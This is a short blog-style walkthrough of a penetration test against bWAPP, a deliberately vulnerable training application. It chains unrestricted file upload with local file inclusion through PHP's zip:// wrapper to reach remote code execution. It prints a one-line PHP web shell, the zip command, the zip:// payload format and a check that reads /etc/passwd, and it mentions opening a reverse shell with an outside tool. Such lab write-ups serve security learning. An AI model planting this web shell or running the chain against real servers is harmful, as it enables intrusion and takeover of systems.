PHP ZIP:// wrapper for RCE

Hi Fellows,

Lets have fun with web pentesting to exploit them. I am going to share small walkthrough on exploiting local file inclusion vulnerability which can be leveraged into remote code execution.

Ideally, this vulnerability can be easily exploited when there are two vulnerability that is Local File Inclusion and Unrestricted file upload.

I use bWAPP to give the walkthrough. Lets exploit the first one that is Unrestricted File Upload. First you need to create a php file that contain small code to accept code execution and give name cmd.php

<?php echo system($_GET["cmd"]); ?>

and the next thing you need to do is to zip the cmd.php with below command

zip cmd.zip cmd.php

when the file is ready then we can upload it to the server by exploiting the unrestricted file upload vulnerability in bWAPP

Once you are able to upload then you need to go to the next step is to exploit the LFI.

We can see that this function has vulnerability on one of this parameter

Lets make sure that this is vulnerable to LFI, we can load /etc/passwd

Let’s have the fun. We know that the above parameter is vulnerable then lets exploit the LFI for RCE. Below is the format to attack this vulnerability

zip:///path/to/filename#dir/file

We know that the zip file that we uploaded is placed in /var/www/bWAPP/images/cmd.zip. Lets exploit it.

Output

Lets do reverse shell

Let’s exploit it further and the fun. I like to share a tools that would help you so much in managing reverse shell and does the heavy lifting at the back to make it full interactive shell. I like to use Girsh that can be downloaded from https://github.com/nodauf/Girsh.git

The good thing is that Girsh allows you to generate the inline code for the reverse shell technique you want to use. I selected the number 4 as my reverse shell command and pasted them to the command like the above picture